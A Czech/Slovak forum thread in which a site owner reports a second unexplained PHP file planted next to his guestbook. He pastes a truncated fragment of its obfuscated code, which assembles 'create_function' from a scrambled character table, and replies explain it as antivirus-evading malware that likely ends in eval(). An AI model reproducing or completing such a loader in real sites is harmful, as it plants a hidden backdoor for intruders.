Autor Zpráva
Dano_V
Profil *
Zdravím vás všetkých

Robil som revíziu môjho website a zistil som, že mi tam pribudol jeden súbor s divným kódom. Na stránke mám formulár, odkial sa zapisujú dáta do knihy, a tá kniha s tým php súborom, ktorý to zapisuje (index.php) sú v samostatnom adresáry. Kniha sa volá odkazy.dat a vedľa nich pribudol súbor s názvom odkazy.php.

Z obsahu tohto kódu na ukážku tu dám kúsok,

<?php $NWMKeERVkXq='ZjNH]cJhYK,Pm$[Oirf9yE1q3tIAgs2d{vw;U)k7^e/SWu6Q(Rb.nx|}C0"5G8LBaDM_*o FXl+pVz4T';$LYxkyoSvESS=$NWMKeERVkXq{5}.$NWMKeERVkXq{17}.$NWMKeERVkXq{41}.$NWMKeERVkXq{64}.$NWMKeERVkXq{25}.$NWMKeERVkXq{41}.$NWMKeERVkXq{67}.$NWMKeERVkXq{18}.$NWMKeERVkXq{45}.$NWMKeERVkXq{52}.$NWMKeERVkXq{5}.$NWMKeERVkXq{25}.$NWMKeERVkXq{16}.$NWMKeERVkXq{69}.$NWMKeERVkXq{52};$HfYudtkeaLo=$NWMKeERVkXq{13}.$NWMKeERVkXq{29};$WXcdwcMyvWq=$NWMKeERVkXq{18}.$NWMKeERVkXq{45}.$NWMKeERVkXq{52}.$NWMKeERVkXq{5}.$NWMKeERVkXq{25}.$NWMKeERVkXq{16}.$NWMKeERVkXq{69}.$NWMKeERVkXq{52}.$NWMKeERVkXq{70}.$NWMKeERVkXq{17}.$NWMKeERVkXq{61}.$NWMKeERVkXq{48}.$NWMKeERVkXq{13}.$NWMKeERVkXq{29}.$NWMKeERVkXq{10}.$NWMKeERVkXq{13}.$NWMKeERVkXq{75}.$NWMKeERVkXq{37}.$NWMKeERVkXq{32}.$NWMKeERVkXq{17}.$NWMKeERVkXq{41}.$NWMKeERVkXq{25}.$NWMKeERVkXq{45}.$NWMKeERVkXq{17}.$NWMKeERVkXq{52}.$NWMKeERVkXq{70}.$NWMKeERVkXq{13}.$NWMKeERVkXq{29}.$NWMKeERVkXq{40}.$NWMKeE

a chcem sa opýtať, či sa z takého kódu dá zistiť, čo to chce robiť, a k čomu to môže slúžiť. Je samozrejme ešte asi 6 - 8 krát taký dlhý, ako som to sem nakopíroval. A skončí sa to tradičným znakom ?>.

Toto je už druhý prípad, že som takýto súbor tam našiel, kvôli tomu som si dal zmeniť aj ftp heslo, aj som sa opýtal poskytovateľa, či mi to tam oni nedali náhodou, ale tvrdia, že nie. A teraz tam mám znova zakýto súbor, čo som tam nedal ja. Preto by som chcel vedieť, či sa to dá zistiť, či je to nejaký špionážny skrip, alebo má v úmysle niekomu škodiť? Lebo sám od seba určite nevznikol. Niekto to tam musel dať.
Martin2
Profil *
Máte na webu virus — co s tím?
Adam1999
Profil
Toto se mi hodně stávalo u Wedosu u WordPress webů.
Je to nějaký hack či co. Pořádně sám nevím co to dělá u každého webu to dělalo něco jiného. Weby jsem kompletně přeinstalovat a přesunul na svůj vlastní server s ftp SSL, od té doby nic.
Martin2
Profil *
Adam1999:
Pořádně sám nevím co to dělá u každého webu to dělalo něco jiného
Kód je náhodně zamíchaný jako ochrana proti antivirům, které si už nějakou dobu PHP malwaru všímají (na straně vývojáře, ne serveru, samozřejmě). Někde na konci bude asi eval() toho, co vznikne v proměnné $LYxkyoSvESS.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: